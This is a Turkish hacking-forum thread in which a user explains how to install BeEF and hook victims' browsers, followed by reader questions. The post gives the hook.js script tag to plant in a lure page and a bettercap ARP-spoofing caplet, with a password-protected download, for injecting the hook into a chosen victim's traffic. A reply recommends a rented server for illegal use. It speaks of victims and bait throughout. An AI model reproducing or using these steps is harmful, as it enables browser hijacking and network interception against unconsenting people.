Beef çalıştırmak için vds falan almam mı gerekiyor yoksa kendi bilgisayarımda wireless bağlayıp siteme kodu eklesem çalışır mı?
BeEF Framework Nedir? Nasıl Kullanılır? (Browserları Sömürme Aracı)
- Konbuyu başlatan Pytang
- Başlangıç tarihi
test amaçlı istiyorsan vds filan gerek yok illegal yöntemle kullanacaksan vds daha iyi tabikide
- 2 Haz 2023
- 136
- 11
Hedef oltaya nasıl geldi neye tikladi mi yükledi mi ne yaparak? Şimdi bu şey hedefe bulasinca nelere eristi
BeEF Nedir ?
Merhaba arkadaşlar bu konuda Beef denilen bir aracı inceliyeceğiz bu araç browser exploitation framework diye geçiyor yani browserları sömürme aracı.
Hackerlar bu aracı hedef bilgisayarın tarayıcısında javascript kodu çalıştırmak için kullanıyor.
BeEF 3 katmandan oluşmaktadır.
1- Saldırgan veya Saldırganların kişisel bilgisayarları
2- BeEFin kurulu olduğu server
3- Hedefler
BeEF Kali Linux'e Nasıl Yüklenir ?
Terminali açıp bunu yazıyoruz.Kod:git clone [url]https://github.com/beefproject/beef[/url]
Yükleme bittikten sonra terminale ls yazıyoruz ve beef karşımıza çıktı.
cd beef yazıyoruz ve beef klasörünün içerisine giriyoruz.
Bir kereliğine mahsus ./install yazıyoruz ve çıkan sorulara "y" diyip enterlıyoruz.
Artık sistemi kapatım açtığımızda "cd beef" "./beef" dememiz yeterli.
Buradaki hata bizden beef in içerisindeki kullanıcı adı şifremizi değişmemizi istiyor.
Bunun için terminale nano config.yaml yazıyoruz.
user ve passwd değiştikten sonra "CTRL-O" "enter" "CTRL-X" yapıp basıp çıkış yapıyoruz.
Beef e giriş yapabilmek için ./beef yazdıktan sonra aşağıdaki adreslerden birine tıklayıp girebilirsiniz.
Arkadaşlar BeEF'i temel olarak anlayabilmeniz için ben apache server üzerinden göstereceğim.
İlk olarak Linux'un içeriside bulunan Apache adında servisi kullanarak web site oluşturacağım.
Bu sadece örnek amaçlıdır siz daha yaratıcı düşünerek kurbanları oltaya takabilirsiniz.
Bunun için konsola gelip service apache2 start yazıyorum.
Daha sonra sitemin indexini düzenliyorum bunun için /var/www/index.html dizinine gidiyorum.
İndex.html i leafpad yada başka bir uygulama yardımıyla açıp içerisine <script src="http://127.0.0.1:3000/hook.js"></script> kodu yapıştırıyoruz 127.0.0.1 yerine kendi İp adresinizi yazmanız gerekiyor.
Kendi ipimizi öğrenmek için terminale gelip ifconfig yazıyoruz benimki 10.0.2.10 bu yüzden koda böyle yazıyorum <script src="http://10.0.2.10:3000/hook.js"></script>
Evet artık hedefimiz oltaya geldi hedefimize uzun süre erişebilmek için kurbanın sitede durması gerekiyor. Peki biz bu durumu nasıl aşabiliriz adam sitemizden çıksa bile nasıl erişebiliriz şimdi buna gelelim.
Kurbanımızın tarayıcısına bir Javascript kodu enjekte edeceğiz bu sayede sitemizden çıksa bile erişim sağlayabileceğiz.
Bunun için Kali Linux da bulunan bettercap'i kullanacağız.
İlk önce konunun aşağısında size verdiğim beefcustom.zip adlı dosyayı indirmeniz gerekiyor.
İndirdiğimiz RAR dosyanın içerisindeki beefcustom adlı dosyayı usr/share/bettercap/caplets dizinine atıyoruz
Beefcustom dosyanın içindeki beefcustom.cap adlı dosyayı leafpad yada başka bir uygulama ile açın.
set arp.spoof.targets 10.0.2.4 yazan yerdeki ip yerine kurbanımızın ipsini yazıyoruz.
Sonra beefcustom.js adlı dosyayı aynı şekilde açıyoruz 10.0.2.8 yerine kendi ip adresimizi yazıyoruz kaydedip kapatıyoruz.
Bettercamp çalıştırmak için terminale bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap yazıyoruz.
Ever artık kurban online şimdi kurbanımızın browserında komutlarımızı deneyelim bunun için alttaki fotoğrafta görülen Commands bölümüne tıklıyoruz.
Yeşil yananlar çalışır, Kırmızı olanlar düşük ihtimalle çalışır demek.
Ben Commands bölümündeki Browser bölümüne tıklıyorum, buradan Hooked Domain de Create Alert Dialog diye bir komut var bu kurbanımıza bir uyarı mesajı gönderecek deniyelim.
Evet uyarı mesajımız geldi.
BEEF CUSTOM İNDİRME LİNKİ : beefcustom.rar indir
RAR PASS : pytang
VIRUS TOTAL : VirusTotal
Konum bu kadar arkadaşlar ilerleyen günlerde beef'in içerisindeki komutları anlatan bir konu açacağım o konuyu okuyarak da beef komutlarını öğrenebilirsiniz, okuduğunuz için teşekkürler.
Merhaba. Apache tanıdık geldi galiba cihazda ayarlarda gôrmüştük. Apache nedir ne yapıyor?
Bir de hedef İP i nasıl buluyorlar?
merhaba. ben anlamadim hedef oltaya nasil geldi? montaj gibi orasi sanki. yukarda kendi İPimizi yaziyoruz sonra birden evet hedef oltaya geldi yazildi.
Hedef neye girince oltaya düşdü?